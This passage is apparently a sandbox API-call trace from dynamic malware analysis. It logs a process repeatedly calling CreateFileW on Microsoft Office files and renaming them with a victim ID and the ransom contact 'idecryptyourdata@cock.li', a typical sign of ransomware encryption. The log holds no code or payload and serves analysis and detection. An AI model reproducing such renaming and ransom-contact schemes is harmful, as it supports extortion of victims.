Office\\root\\Office16\\1033\\TellMeOneNote.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeonenote.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.759] CloseHandle (hObject=0x434) returned 1 [0167.759] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.759] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlook.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlook.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.759] CloseHandle (hObject=0x434) returned 1 [0167.760] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.760] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookAddr.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookaddr.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.760] CloseHandle (hObject=0x434) returned 1 [0167.761] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.761] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookAppt.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookappt.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.761] CloseHandle (hObject=0x434) returned 1 [0167.761] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.762] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMail.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmail.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.762] CloseHandle (hObject=0x434) returned 1 [0167.762] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.762] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMailRead.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmailread.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.763] CloseHandle (hObject=0x434) returned 1 [0167.763] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.763] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMeetingReqRead.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmeetingreqread.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.764] CloseHandle (hObject=0x434) returned 1 [0167.764] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.764] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookMeetingReqSend.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlookmeetingreqsend.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.765] CloseHandle (hObject=0x434) returned 1 [0167.765] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.765] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookTask.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlooktask.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.765] CloseHandle (hObject=0x434) returned 1 [0167.766] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.766] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMePowerPoint.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmepowerpoint.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.766] CloseHandle (hObject=0x434) returned 1 [0167.767] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.767] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeProject.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeproject.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.767] CloseHandle (hObject=0x434) returned 1 [0167.768] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.768] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeVisio.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmevisio.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.768] CloseHandle (hObject=0x434) returned 1 [0167.768] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.769] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeWord.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeword.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.769] CloseHandle (hObject=0x434) returned 1 [0167.770] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.770] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TIMESOLN.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\timesoln.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.770] CloseHandle (hObject=0x434) returned 1 [0167.843] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.843] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.843] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VALVE.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\valve.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.843] CloseHandle (hObject=0x434) returned 1 [0167.845] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.845] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISCOLOR.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\viscolor.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.845] CloseHandle (hObject=0x434) returned 1 [0167.847] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.847] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.847] CloseHandle (hObject=0x434) returned 1 [0167.848] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.848] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.848] CloseHandle (hObject=0x434) returned 1 [0167.849] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.849] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.849] CloseHandle (hObject=0x434) returned 1 [0167.850] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.850] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.850] CloseHandle (hObject=0x434) returned 1 [0167.851] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.851] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.851] CloseHandle (hObject=0x434) returned 1 [0167.852] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.852] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.852] CloseHandle (hObject=0x434) returned 1 [0167.852] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.852] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.853] CloseHandle (hObject=0x434) returned 1 [0167.853] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.853] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.853] CloseHandle (hObject=0x434) returned 1 [0167.854] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.854] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.854] CloseHandle (hObject=0x434) returned 1 [0167.855] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.855] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.855] CloseHandle (hObject=0x434) returned 1 [0167.856] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.856] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.856] CloseHandle (hObject=0x434) returned 1 [0167.857] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.857] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.857] CloseHandle (hObject=0x434) returned 1 [0167.859] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.859] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.859] CloseHandle (hObject=0x434) returned 1 [0167.860] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.860] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.860] CloseHandle (hObject=0x434) returned 1 [0167.861] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.861] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.861] CloseHandle (hObject=0x434) returned 1 [0167.862] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.862] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISUTILS.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visutils.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.862] CloseHandle (hObject=0x434) returned 1 [0167.863] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.863] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISWEB.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visweb.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 